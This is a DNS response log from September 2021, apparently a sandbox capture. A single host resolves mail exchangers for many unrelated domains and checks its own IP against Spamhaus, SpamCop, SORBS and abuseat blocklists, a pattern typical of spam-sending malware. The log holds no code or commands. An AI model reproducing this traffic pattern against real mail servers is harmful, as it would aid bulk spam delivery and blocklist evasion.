Sep 5, 2021 15:50:47.457086086 CEST	8.8.8.8	192.168.2.4	0x26f1	No error (0)	cxr.mx.a.cloudfilter.net		18.209.118.139	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:47.463594913 CEST	8.8.8.8	192.168.2.4	0x5653	No error (0)	icloud.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:47.463594913 CEST	8.8.8.8	192.168.2.4	0x5653	No error (0)	icloud.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:47.509110928 CEST	8.8.8.8	192.168.2.4	0xca82	No error (0)	mx01.mail.icloud.com		17.42.251.10	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:47.509110928 CEST	8.8.8.8	192.168.2.4	0xca82	No error (0)	mx01.mail.icloud.com		17.56.9.17	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:47.509110928 CEST	8.8.8.8	192.168.2.4	0xca82	No error (0)	mx01.mail.icloud.com		17.57.152.9	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:47.509110928 CEST	8.8.8.8	192.168.2.4	0xca82	No error (0)	mx01.mail.icloud.com		17.57.154.6	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:47.509110928 CEST	8.8.8.8	192.168.2.4	0xca82	No error (0)	mx01.mail.icloud.com		17.57.154.23	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:47.664483070 CEST	8.8.8.8	192.168.2.4	0x182d	No error (0)	lorentzmeats.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:47.664483070 CEST	8.8.8.8	192.168.2.4	0x182d	No error (0)	lorentzmeats.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:48.063961029 CEST	8.8.8.8	192.168.2.4	0xd095	No error (0)	mx-01-us-east-2.prod.hydra.sophos.com		3.130.46.147	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:48.063961029 CEST	8.8.8.8	192.168.2.4	0xd095	No error (0)	mx-01-us-east-2.prod.hydra.sophos.com		3.22.59.95	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:48.063961029 CEST	8.8.8.8	192.168.2.4	0xd095	No error (0)	mx-01-us-east-2.prod.hydra.sophos.com		18.220.48.190	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:48.067950010 CEST	8.8.8.8	192.168.2.4	0x5812	No error (0)	cxr.mx.a.cloudfilter.net		52.73.137.222	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:48.067950010 CEST	8.8.8.8	192.168.2.4	0x5812	No error (0)	cxr.mx.a.cloudfilter.net		35.162.106.154	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:48.067950010 CEST	8.8.8.8	192.168.2.4	0x5812	No error (0)	cxr.mx.a.cloudfilter.net		34.212.80.54	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:48.067950010 CEST	8.8.8.8	192.168.2.4	0x5812	No error (0)	cxr.mx.a.cloudfilter.net		18.209.118.139	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:48.090928078 CEST	8.8.8.8	192.168.2.4	0x68ab	No error (0)	yopmail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:48.150621891 CEST	8.8.8.8	192.168.2.4	0x2831	No error (0)	smtp.yopmail.com		87.98.164.155	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:48.377618074 CEST	8.8.8.8	192.168.2.4	0x6c12	No error (0)	whiskeyiota.webmailious.top			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:48.451385021 CEST	8.8.8.8	192.168.2.4	0x5004	No error (0)	mail.webmailious.top		176.9.75.42	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:48.451385021 CEST	8.8.8.8	192.168.2.4	0x5004	No error (0)	mail.webmailious.top		88.198.24.108	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:48.451385021 CEST	8.8.8.8	192.168.2.4	0x5004	No error (0)	mail.webmailious.top		88.198.50.103	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:48.451385021 CEST	8.8.8.8	192.168.2.4	0x5004	No error (0)	mail.webmailious.top		176.9.119.170	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:48.451385021 CEST	8.8.8.8	192.168.2.4	0x5004	No error (0)	mail.webmailious.top		46.4.96.137	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:49.441504955 CEST	8.8.8.8	192.168.2.4	0x150d	No error (0)	syd.catholic.edu.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:49.441504955 CEST	8.8.8.8	192.168.2.4	0x150d	No error (0)	syd.catholic.edu.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:49.441504955 CEST	8.8.8.8	192.168.2.4	0x150d	No error (0)	syd.catholic.edu.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:49.441504955 CEST	8.8.8.8	192.168.2.4	0x150d	No error (0)	syd.catholic.edu.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:49.441504955 CEST	8.8.8.8	192.168.2.4	0x150d	No error (0)	syd.catholic.edu.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:49.441504955 CEST	8.8.8.8	192.168.2.4	0x150d	No error (0)	syd.catholic.edu.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:49.441504955 CEST	8.8.8.8	192.168.2.4	0x150d	No error (0)	syd.catholic.edu.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:49.569339037 CEST	8.8.8.8	192.168.2.4	0xa704	No error (0)	cxr.mx.a.cloudfilter.net		52.73.137.222	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:49.569339037 CEST	8.8.8.8	192.168.2.4	0xa704	No error (0)	cxr.mx.a.cloudfilter.net		35.162.106.154	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:49.569339037 CEST	8.8.8.8	192.168.2.4	0xa704	No error (0)	cxr.mx.a.cloudfilter.net		34.212.80.54	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:49.569339037 CEST	8.8.8.8	192.168.2.4	0xa704	No error (0)	cxr.mx.a.cloudfilter.net		18.209.118.139	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:49.569626093 CEST	8.8.8.8	192.168.2.4	0xca9d	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.207.1	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:49.569626093 CEST	8.8.8.8	192.168.2.4	0xca9d	No error (0)	microsoft-com.mail.protection.outlook.com		52.101.24.0	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:49.576369047 CEST	8.8.8.8	192.168.2.4	0x8637	No error (0)	alt1.aspmx.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:50.216923952 CEST	8.8.8.8	192.168.2.4	0xaab2	No error (0)	cxr.mx.a.cloudfilter.net		35.162.106.154	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:50.216923952 CEST	8.8.8.8	192.168.2.4	0xaab2	No error (0)	cxr.mx.a.cloudfilter.net		34.212.80.54	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:50.216923952 CEST	8.8.8.8	192.168.2.4	0xaab2	No error (0)	cxr.mx.a.cloudfilter.net		52.73.137.222	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:50.216923952 CEST	8.8.8.8	192.168.2.4	0xaab2	No error (0)	cxr.mx.a.cloudfilter.net		18.209.118.139	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:50.323683977 CEST	8.8.8.8	192.168.2.4	0xce38	No error (0)	metropharm.com.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:50.323683977 CEST	8.8.8.8	192.168.2.4	0xce38	No error (0)	metropharm.com.au			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:50.488183022 CEST	8.8.8.8	192.168.2.4	0x22e7	No error (0)	cluster1.us.messagelabs.com		67.219.246.204	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:50.488183022 CEST	8.8.8.8	192.168.2.4	0x22e7	No error (0)	cluster1.us.messagelabs.com		67.219.246.96	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:50.488183022 CEST	8.8.8.8	192.168.2.4	0x22e7	No error (0)	cluster1.us.messagelabs.com		67.219.250.192	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:50.488183022 CEST	8.8.8.8	192.168.2.4	0x22e7	No error (0)	cluster1.us.messagelabs.com		67.219.250.108	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:50.488183022 CEST	8.8.8.8	192.168.2.4	0x22e7	No error (0)	cluster1.us.messagelabs.com		67.219.246.108	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:50.488183022 CEST	8.8.8.8	192.168.2.4	0x22e7	No error (0)	cluster1.us.messagelabs.com		67.219.246.192	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:50.488183022 CEST	8.8.8.8	192.168.2.4	0x22e7	No error (0)	cluster1.us.messagelabs.com		67.219.250.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:50.488183022 CEST	8.8.8.8	192.168.2.4	0x22e7	No error (0)	cluster1.us.messagelabs.com		67.219.250.204	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:50.488183022 CEST	8.8.8.8	192.168.2.4	0x22e7	No error (0)	cluster1.us.messagelabs.com		67.219.250.96	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:50.488183022 CEST	8.8.8.8	192.168.2.4	0x22e7	No error (0)	cluster1.us.messagelabs.com		67.219.250.202	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:50.488183022 CEST	8.8.8.8	192.168.2.4	0x22e7	No error (0)	cluster1.us.messagelabs.com		67.219.246.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:50.488183022 CEST	8.8.8.8	192.168.2.4	0x22e7	No error (0)	cluster1.us.messagelabs.com		67.219.246.202	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:50.488749027 CEST	8.8.8.8	192.168.2.4	0x7a81	No error (0)	anntaylor.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:50.488749027 CEST	8.8.8.8	192.168.2.4	0x7a81	No error (0)	anntaylor.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:50.696185112 CEST	8.8.8.8	192.168.2.4	0x7b8f	No error (0)	mxa-00217301.gslb.pphosted.com		148.163.152.155	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:51.139242887 CEST	8.8.8.8	192.168.2.4	0x1f29	No error (0)	flash.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:51.139242887 CEST	8.8.8.8	192.168.2.4	0x1f29	No error (0)	flash.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:51.139242887 CEST	8.8.8.8	192.168.2.4	0x1f29	No error (0)	flash.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:51.139242887 CEST	8.8.8.8	192.168.2.4	0x1f29	No error (0)	flash.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:51.217170954 CEST	8.8.8.8	192.168.2.4	0x8832	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:51.217170954 CEST	8.8.8.8	192.168.2.4	0x8832	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:51.217170954 CEST	8.8.8.8	192.168.2.4	0x8832	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:51.217170954 CEST	8.8.8.8	192.168.2.4	0x8832	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:51.217170954 CEST	8.8.8.8	192.168.2.4	0x8832	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:51.217170954 CEST	8.8.8.8	192.168.2.4	0x8832	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:51.217170954 CEST	8.8.8.8	192.168.2.4	0x8832	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:51.217170954 CEST	8.8.8.8	192.168.2.4	0x8832	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:51.217216015 CEST	8.8.8.8	192.168.2.4	0x1bac	No error (0)	ff-ip4-mx-vip2.prodigy.net		144.160.159.22	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:52.025664091 CEST	8.8.8.8	192.168.2.4	0xe310	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:52.025664091 CEST	8.8.8.8	192.168.2.4	0xe310	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:52.025664091 CEST	8.8.8.8	192.168.2.4	0xe310	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:52.025664091 CEST	8.8.8.8	192.168.2.4	0xe310	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:52.025664091 CEST	8.8.8.8	192.168.2.4	0xe310	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:52.025664091 CEST	8.8.8.8	192.168.2.4	0xe310	No error (0)	mta6.am0.yahoodns.net		67.195.204.72	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:52.025664091 CEST	8.8.8.8	192.168.2.4	0xe310	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:52.025664091 CEST	8.8.8.8	192.168.2.4	0xe310	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:52.363038063 CEST	8.8.8.8	192.168.2.4	0x7960	No error (0)	mx01.mail.icloud.com		17.42.251.10	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:52.363038063 CEST	8.8.8.8	192.168.2.4	0x7960	No error (0)	mx01.mail.icloud.com		17.56.9.17	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:52.363038063 CEST	8.8.8.8	192.168.2.4	0x7960	No error (0)	mx01.mail.icloud.com		17.57.152.9	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:52.363038063 CEST	8.8.8.8	192.168.2.4	0x7960	No error (0)	mx01.mail.icloud.com		17.57.154.6	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:52.363038063 CEST	8.8.8.8	192.168.2.4	0x7960	No error (0)	mx01.mail.icloud.com		17.57.154.23	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:52.368791103 CEST	8.8.8.8	192.168.2.4	0x89c2	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:53.145132065 CEST	8.8.8.8	192.168.2.4	0xca1c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.22.161	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:53.145132065 CEST	8.8.8.8	192.168.2.4	0xca1c	No error (0)	hotmail-com.olc.protection.outlook.com		104.47.18.161	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:53.417012930 CEST	8.8.8.8	192.168.2.4	0x45a	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:53.417012930 CEST	8.8.8.8	192.168.2.4	0x45a	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:53.417012930 CEST	8.8.8.8	192.168.2.4	0x45a	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:53.417012930 CEST	8.8.8.8	192.168.2.4	0x45a	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:53.417012930 CEST	8.8.8.8	192.168.2.4	0x45a	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:53.417012930 CEST	8.8.8.8	192.168.2.4	0x45a	No error (0)	mta6.am0.yahoodns.net		67.195.204.72	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:53.417012930 CEST	8.8.8.8	192.168.2.4	0x45a	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:53.417012930 CEST	8.8.8.8	192.168.2.4	0x45a	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:53.426233053 CEST	8.8.8.8	192.168.2.4	0xb90e	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.324887991 CEST	8.8.8.8	192.168.2.4	0xbd4c	Name error (3)	41.52.17.84.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.374862909 CEST	8.8.8.8	192.168.2.4	0x7689	Name error (3)	41.52.17.84.bl.spamcop.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.463296890 CEST	8.8.8.8	192.168.2.4	0xa1dc	Name error (3)	41.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.489635944 CEST	8.8.8.8	192.168.2.4	0x6353	No error (0)	unicauca.edu.co			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:54.489635944 CEST	8.8.8.8	192.168.2.4	0x6353	No error (0)	unicauca.edu.co			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:54.489635944 CEST	8.8.8.8	192.168.2.4	0x6353	No error (0)	unicauca.edu.co			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:54.489635944 CEST	8.8.8.8	192.168.2.4	0x6353	No error (0)	unicauca.edu.co			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:54.489635944 CEST	8.8.8.8	192.168.2.4	0x6353	No error (0)	unicauca.edu.co			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:54.514503002 CEST	8.8.8.8	192.168.2.4	0x3f94	Name error (3)	41.52.17.84.sbl-xbl.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.533045053 CEST	8.8.8.8	192.168.2.4	0xae27	No error (0)	ASPMX.L.GOOGLE.COM		108.177.119.26	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.566081047 CEST	8.8.8.8	192.168.2.4	0x491e	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.566081047 CEST	8.8.8.8	192.168.2.4	0x491e	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.566081047 CEST	8.8.8.8	192.168.2.4	0x491e	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.566081047 CEST	8.8.8.8	192.168.2.4	0x491e	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.566081047 CEST	8.8.8.8	192.168.2.4	0x491e	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.566081047 CEST	8.8.8.8	192.168.2.4	0x491e	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.566081047 CEST	8.8.8.8	192.168.2.4	0x491e	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.566081047 CEST	8.8.8.8	192.168.2.4	0x491e	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.576806068 CEST	8.8.8.8	192.168.2.4	0x10b9	Name error (3)	41.52.17.84.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.579438925 CEST	8.8.8.8	192.168.2.4	0xd253	No error (0)	rocketmail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:54.579438925 CEST	8.8.8.8	192.168.2.4	0xd253	No error (0)	rocketmail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:54.579438925 CEST	8.8.8.8	192.168.2.4	0xd253	No error (0)	rocketmail.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:54.616750002 CEST	8.8.8.8	192.168.2.4	0x7129	Name error (3)	41.52.17.84.dnsbl.sorbs.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.652781963 CEST	8.8.8.8	192.168.2.4	0x89b7	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.652781963 CEST	8.8.8.8	192.168.2.4	0x89b7	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.652781963 CEST	8.8.8.8	192.168.2.4	0x89b7	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.652781963 CEST	8.8.8.8	192.168.2.4	0x89b7	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.652781963 CEST	8.8.8.8	192.168.2.4	0x89b7	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.652781963 CEST	8.8.8.8	192.168.2.4	0x89b7	No error (0)	mta6.am0.yahoodns.net		67.195.204.72	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.652781963 CEST	8.8.8.8	192.168.2.4	0x89b7	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.652781963 CEST	8.8.8.8	192.168.2.4	0x89b7	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.663476944 CEST	8.8.8.8	192.168.2.4	0xd3a	Name error (3)	41.52.17.84.bl.spamcop.net	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.716418982 CEST	8.8.8.8	192.168.2.4	0xd4e8	Name error (3)	41.52.17.84.zen.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.776635885 CEST	8.8.8.8	192.168.2.4	0xee65	Name error (3)	41.52.17.84.sbl-xbl.spamhaus.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:54.941026926 CEST	8.8.8.8	192.168.2.4	0x1e05	Name error (3)	41.52.17.84.cbl.abuseat.org	none	none	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:55.290416956 CEST	8.8.8.8	192.168.2.4	0xd69f	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:55.381592035 CEST	8.8.8.8	192.168.2.4	0x93f	No error (0)	pupa.it			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:55.381592035 CEST	8.8.8.8	192.168.2.4	0x93f	No error (0)	pupa.it			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:55.767441988 CEST	84.200.69.80	192.168.2.4	0x200	No error (0)	41.52.17.84.in-addr.arpa			PTR (Pointer record)	IN (0x0001)
Sep 5, 2021 15:50:55.775459051 CEST	8.8.8.8	192.168.2.4	0x9cc4	No error (0)	d314473.a.ess.de.barracudanetworks.com		18.185.115.251	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:55.775459051 CEST	8.8.8.8	192.168.2.4	0x9cc4	No error (0)	d314473.a.ess.de.barracudanetworks.com		18.185.115.252	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:55.775459051 CEST	8.8.8.8	192.168.2.4	0x9cc4	No error (0)	d314473.a.ess.de.barracudanetworks.com		18.185.115.250	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:55.839299917 CEST	8.8.8.8	192.168.2.4	0xc754	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:56.655160904 CEST	8.8.8.8	192.168.2.4	0x7623	No error (0)	naver.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:56.655160904 CEST	8.8.8.8	192.168.2.4	0x7623	No error (0)	naver.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:56.655160904 CEST	8.8.8.8	192.168.2.4	0x7623	No error (0)	naver.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:56.697813988 CEST	8.8.8.8	192.168.2.4	0x9807	No error (0)	mx2.naver.com		125.209.238.137	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:57.798089027 CEST	8.8.8.8	192.168.2.4	0x2e75	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:57.798089027 CEST	8.8.8.8	192.168.2.4	0x2e75	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:57.798089027 CEST	8.8.8.8	192.168.2.4	0x2e75	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:57.798089027 CEST	8.8.8.8	192.168.2.4	0x2e75	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:57.798089027 CEST	8.8.8.8	192.168.2.4	0x2e75	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:57.798089027 CEST	8.8.8.8	192.168.2.4	0x2e75	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:57.798089027 CEST	8.8.8.8	192.168.2.4	0x2e75	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:57.798089027 CEST	8.8.8.8	192.168.2.4	0x2e75	No error (0)	mta6.am0.yahoodns.net		67.195.228.109	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:57.861797094 CEST	8.8.8.8	192.168.2.4	0x9d4a	No error (0)	email.cz			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:57.861797094 CEST	8.8.8.8	192.168.2.4	0x9d4a	No error (0)	email.cz			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:50:57.909017086 CEST	8.8.8.8	192.168.2.4	0x7543	No error (0)	mx1.seznam.cz		77.75.76.42	A (IP address)	IN (0x0001)
Sep 5, 2021 15:50:57.909017086 CEST	8.8.8.8	192.168.2.4	0x7543	No error (0)	mx1.seznam.cz		77.75.78.42	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:00.110574961 CEST	8.8.8.8	192.168.2.4	0x9714	No error (0)	mx1.comcast.net		96.114.157.80	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:00.115736961 CEST	8.8.8.8	192.168.2.4	0x4d2a	No error (0)	hamstermail.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:51:00.158334017 CEST	8.8.8.8	192.168.2.4	0x924a	No error (0)	mx.powered.name		62.141.42.208	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:00.174077988 CEST	8.8.8.8	192.168.2.4	0xe881	No error (0)	microsoft-com.mail.protection.outlook.com		52.101.24.0	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:00.174077988 CEST	8.8.8.8	192.168.2.4	0xe881	No error (0)	microsoft-com.mail.protection.outlook.com		40.93.212.0	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:00.792454004 CEST	8.8.8.8	192.168.2.4	0xbb18	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:02.342619896 CEST	8.8.8.8	192.168.2.4	0x28c8	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:02.605525017 CEST	8.8.8.8	192.168.2.4	0xc1f0	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:03.398310900 CEST	8.8.8.8	192.168.2.4	0x1841	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:03.398310900 CEST	8.8.8.8	192.168.2.4	0x1841	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:03.398310900 CEST	8.8.8.8	192.168.2.4	0x1841	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:51:03.398310900 CEST	8.8.8.8	192.168.2.4	0x1841	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
